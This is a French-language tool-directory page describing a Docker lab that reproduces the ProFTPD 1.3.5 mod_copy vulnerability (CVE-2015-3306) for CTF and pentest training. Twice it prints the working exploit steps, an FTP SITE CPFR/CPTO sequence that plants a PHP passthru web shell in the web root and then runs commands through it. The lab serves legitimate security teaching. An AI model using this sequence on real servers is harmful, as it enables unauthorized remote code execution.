Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - Configuration d'un laboratoire local RCE (Docker) facile à utiliser pour le Red Teaming ou les Tests de Pénétration | Kitploit
Outils/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique
GitHub
netw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - Configuration d'un laboratoire local RCE (Docker) facile à utiliser pour le Red Teaming ou les Tests de Pénétration

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FRANÇAIS CI-DESSOUS

CVE20153306

Ce laboratoire a été conçu pour simuler la vulnérabilité CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
Il est utilisé pour apprendre l’injection de Web Shell RCE via le module mod_copy de ProFTPD.


Fonctionnalités

  • ProFTPD 1.3.5 vulnérable
  • Activation complète de mod_copy (SITE CPFR / SITE CPTO)
  • Prise en charge du FTP anonyme
  • Apache2 + PHP5 pour simuler la racine web /var/www/html
  • L’attaquant peut utiliser SITE CPFR/CPTO pour copier un fichier vers la racine web afin de déclencher une RCE
  • Génération automatique de flag_RANDOM.txt à chaque démarrage du conteneur
  • Laboratoire idéal pour CTF / Red Team / Pentest Training

  • Structure des répertoires

    root@kitploit:~
    /etc/proftpd/proftpd.conf
    /usr/local/proftpd/
    /var/www/html/
    /tmp/flag_xxx.txt
    /entrypoint.sh
    

    Utilisation (Exécution du conteneur)

    root@kitploit:~
    docker build -t sentinel7-proftpd-lab .
    docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
    

    Méthode de test de la vulnérabilité CVE-2015-3306

    root@kitploit:~
    nc <IP> 21
    SITE CPFR /proc/self/cmdline
    SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
    
    SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
    SITE CPTO /var/www/html/webshell.php
    

    Ouvrir via le navigateur :

    root@kitploit:~
    http://<IP>/webshell.php?cmd=<commande>
    

    Flag

    Stocké dans :

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Version française — Laboratoire RCE ProFTPD 1.3.5 (mod_copy)

    Ce laboratoire simule CVE-2015-3306 en utilisant ProFTPD 1.3.5 avec mod_copy, permettant aux attaquants d’effectuer une copie de fichier distante vers RCE via ProFTPD mod_copy.


    Fonctionnalités

    • ProFTPD 1.3.5 vulnérable compilé depuis les sources
    • Activation de mod_copy (SITE CPFR + SITE CPTO)
    • Accès FTP anonyme
    • Apache2 + PHP5 pour l’exécution du webshell
    • Génération automatique de flag_RANDOM.txt au démarrage du conteneur
    • Parfait pour les CTF, l’éducation et la recherche d’exploits

    Exemple de test d’exploitation

    root@kitploit:~
    nc <IP> 21
    SITE CPFR /proc/self/cmdline
    SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
    
    SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
    SITE CPTO /var/www/html/webshell.php
    

    Puis exécuter :

    root@kitploit:~
    http://<IP>/webshell.php?cmd=<commande>
    

    Emplacement du flag

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Avertissement

    À des fins éducatives et de tests d’intrusion autorisés uniquement.

    Télécharger l’outil